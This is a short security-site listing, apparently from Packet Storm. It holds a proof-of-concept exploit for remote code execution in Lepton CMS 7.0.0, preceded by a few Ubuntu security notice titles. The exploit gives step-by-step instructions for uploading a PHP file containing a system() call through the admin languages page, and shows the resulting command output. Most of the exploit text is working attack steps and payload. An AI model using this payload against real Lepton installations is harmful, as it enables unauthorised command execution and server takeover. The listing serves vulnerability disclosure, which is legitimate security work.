Ubuntu Security Notice USN-7089-6

Ubuntu Security Notice USN-7112-1

Ubuntu Security Notice USN-7111-1

Ubuntu Security Notice USN-7088-5

Ubuntu Security Notice USN-7089-5

Lepton CMS version 7.0.0 suffers from a remote code execution vulnerability.

    ## Exploit Title: LeptonCMS Version : 7.0.0  Remote Code Execution### Date: 2024-1-19### Exploit Author: tmrswrr### Category: Webapps### Vendor Homepage: https://www.lepton-cms.com/### Version : 7.0.0### Tested on: https://www.softaculous.com/apps/cms/LEPTON1 ) Login with admin cred   >  https://127.0.0.1/LEPTON/backend/login/index.php2 ) Go to Languages place   > https://127.0.0.1/LEPTON/backend/languages/index.php3 ) Upload upgrade.php file in languages place > <?php echo system('id'); ?>4 ) After click install you will be see result### Result :  uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)

Headline

Lepton CMS 7.0.0 Remote Code Execution

Packet Storm: Latest News